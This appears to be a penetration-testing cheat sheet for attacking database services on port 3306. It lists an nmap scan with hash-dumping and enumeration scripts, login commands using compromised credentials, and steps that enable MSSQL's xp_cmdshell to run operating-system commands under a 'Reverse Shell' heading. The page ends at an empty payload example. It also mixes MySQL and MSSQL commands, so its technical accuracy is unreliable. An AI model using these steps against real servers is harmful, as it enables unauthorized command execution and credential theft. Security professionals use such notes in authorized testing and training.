MYSQL (3306)
1. Basics
Scanning
sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>Initiate connection
mysql -h <IP> -u <username> -p <pass> [-P <port>]
sqsh -S <IP> -U <username> -P <password> -D <database>
For windows sql instances
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth2. Reverse Shell
1. Initiate Connection with either mysql or sqsh
# In sqsh, you need to use GO after writing the query to send it
Do one by one each command:
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'Manual Code Execution:
Payload Example:
Last updated